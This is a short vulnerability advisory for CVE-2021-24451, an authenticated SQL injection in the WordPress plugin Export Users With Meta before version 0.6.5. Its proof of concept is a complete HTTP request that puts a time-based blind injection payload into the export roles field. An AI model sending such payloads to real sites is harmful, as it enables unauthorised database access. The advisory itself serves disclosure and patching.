Export Users With Meta < 0.6.5 – Admin+ SQLi | CVE 2021-24451

Description

The plugin did not escape the list of roles to export before using them in a SQL statement in the export functionality, available to admins, leading to an authenticated SQL Injection.

Proof of Concept

POST /wp-admin/users.php?page=uewm_settings HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------91314853327906118943368521591
Content-Length: 1309
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

-----------------------------91314853327906118943368521591
Content-Disposition: form-data; name="uewm_roles[]"

editor'%20AND%20(select*from(select(sleep(10)))a)+'
-----------------------------91314853327906118943368521591
Content-Disposition: form-data; name="uewm_use_custom_csv_settings"

1
-----------------------------91314853327906118943368521591
Content-Disposition: form-data; name="uewm_field_separator"

custom
-----------------------------91314853327906118943368521591
Content-Disposition: form-data; name="uewm_custom_field_separator"

=
-----------------------------91314853327906118943368521591
Content-Disposition: form-data; name="uewm_text_qualifier"

double-quote
-----------------------------91314853327906118943368521591
Content-Disposition: form-data; name="uewm_custom_text_qualifier"

"
-----------------------------91314853327906118943368521591
Content-Disposition: form-data; name="save"

Save changes
-----------------------------91314853327906118943368521591
Content-Disposition: form-data; name="_wpnonce"

0c475bfd14
-----------------------------91314853327906118943368521591
Content-Disposition: form-data; name="_wp_http_referer"

/wp-admin/users.php?page=uewm_settings
-----------------------------91314853327906118943368521591--